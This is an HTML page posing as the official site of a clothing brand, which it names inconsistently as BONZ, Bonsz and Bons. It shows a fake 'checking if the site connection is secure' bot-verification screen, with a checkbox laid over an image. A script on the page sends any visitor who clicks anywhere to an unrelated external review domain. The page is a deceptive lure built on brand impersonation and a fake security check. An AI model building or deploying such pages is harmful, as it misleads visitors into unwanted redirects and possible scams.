<!DOCTYPE html>
<html class="page" lang="ja">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta property="og:image" content=""/>
<meta name="description" content="Discover the BONZ Official Website. Shop Mens &amp; Womens fashion clothing in NZ and explore luxury home goods, accessories and more. "/>
<meta name="keywords" content="womens clothing, mens fashion, womens fashion in NZ, luxury home goods, luxury apparel"/>
    <title>Bonsz Official</title>
    <base href="">
<style>
    .main {
      width: 55%;
      margin: 100px auto;
    }

    .text {
      font-size: 2.5rem;
    }

    .text2 {
      margin-top: 35px;
      font-size: 1.5rem;
      font-weight: 500;
    }

    .text3 {
      margin-top: 10px;
      font-size: 1.2rem;
    }

    .text4 {
      margin-top: 30px;
      font-weight: bold;
      font-size: 1rem;
    }

    .text5 {
      margin-top: 10px;
      font-size: 0.9rem;
    }

    .image2 {
      width: 420px;
      height: 80px;
    }
     .checkbox {
      left: 12px;
      top: 23%;
      width: 40px;
      height: 35px;
      cursor: pointer;
      position: absolute;
    }

    @media screen and (max-width: 1000px) {
      .main {
        width: 85%;
      }
      .text {
        font-size: 1.8rem;
      }
      .image2 {
        width: 100%;
      }
    }
    @media screen and (max-width: 600px) {
      .checkbox {
        display: block !important;
        left: 5px;
        top: 23%;
        width: 13%;
        height: 35px;
      }
    }

    @media screen and (min-width: 601px) and (max-width: 1024px) {
      .checkbox {
        display: none;
      }
    }
  </style>
</head>
<body class="">
    <div>
        <main class="main">
          <h3 class="text">
            Bons Official Site
          </h3>
          <p class="text2">Checking if the site connection is secure</p>
    
          <p class="text3">
            We needs to review the security of your connection before proceeding Bons
          </p>
    
          <div style="margin-top: 30px; position: relative;">
            <img src="../public/image.png" alt="Logo" class="image2" />
            <input type="checkbox" class="checkbox" />
          </div>
          <p class="text4">Why am I seeing this page?</p>
          <p class="text5">
            Requests from malicious bots can pose as legitimate traffic.
            Occasionally, you may see this page while the site ensures that the connection is secure.
          </p>
        </main>
      </div>
      <script>
  let redirected = false;
  document.body.addEventListener("click", () => {
    if (!redirected) {
      redirected = true;
      timeoutId = setTimeout(() => {
        window.location.href = "https://blogreview.pro/skins/review-bons";
      }, 300);
    }
  });
</script>
</body>
</html>
